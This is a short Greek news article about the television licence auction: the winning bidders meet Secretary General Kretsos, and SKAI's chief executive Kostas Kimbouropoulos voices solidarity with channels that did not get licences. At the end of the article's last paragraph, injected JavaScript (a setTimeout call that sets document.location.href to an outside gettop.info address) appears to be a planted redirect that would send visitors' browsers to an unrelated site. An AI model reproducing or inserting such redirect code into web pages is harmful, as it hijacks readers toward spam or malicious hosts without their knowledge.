Κιμπουρόπουλος (ΣΚΑΙ): Συμπαραστεκόμαστε στα κανάλια που δεν πήραν άδεια

0
8

 

 

Την πύλη της Γενικής Γραμματείας Ενημέρωσης πέρασαν οι εκπρόσωποι των τεσσάρων υπερθεματιστών των τηλεοπτικών αδειών, για την προγραμματισμένη συνάντηση τους με τον Γενικό Γραμματέα Λευτέρη Κρέτσο.

Βέβαια η αρχική ενημέρωση ήταν πως οι ίδιοι οι καναλάρχες θα συναντούσαν στο Μέγαρο Μαξίμου τον υπουργό Επικρατείας κ. Παππά, την κυβερνητική εκπρόσωπο Όλγα Γεροβασίλη και τον Γενικό Γραμματέα Ενημέρωσης κ. Κρέτσο, αλλά τελικά με νεότερη πληροφόρηση άλλαξε ο τόπος συνάντησης οπως και οι συμμετέχοντες σε αυτήν. Καθώς όπως έγινε γνωστό, μόνο ο κ.Κρέτσος (τελικά)  θα συναντηθεί με τους εκπροσώπους των υπερθεματιστών.

Μετά το πέρας της συνάντησης, ο γγ Ενημέρωσης και Επικοινωνίας θα ενημερώσει για τα αποτελέσματά της τον υπουργό Επικρατείας, Νίκο Παππά, ο οποίος θα έχει εντός της ημέρας συναντήσεις με τις ιδιοκτησίες των προσωρινών υπερθεματιστών.

Στο μεταξύ προσερχόμενος στη συνάντηση ο διευθύνων σύμβουλος του ΣΚΑΙ, Κώστας Κιμπουρόπουλος εξέφρασε την απόλυτη συμπαράστασή του στους εργαζόμενους των καναλιών που δεν έχουν λάβει άδεια.

«Συμπαραστεκόμαστε στα κανάλια που έμειναν εκτός και δεν κατάφεραν να εξασφαλίσουν άδεια καθώς και στους εργαζόμενους τους», δήλωσε o Κώστας Κιμπουρόπουλος.

«Η πρόσκληση από την κυβέρνηση είναι επίσημη για να συζητηθούν διαδικαστικά και πληροφοριακά θέματα», τόνισε ο κ Κιμπουρόπουλος, κάνοντας λόγο για στρεβλώσεις που δημιούργησε αυτή η διαδικασία..

Απαντώντας σε ερώτηση για το ενδεχόμενο συνεργασιών, είπε ότι αυτό είναι κάτι εξαιρετικά προσωρινό και υποθετικό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here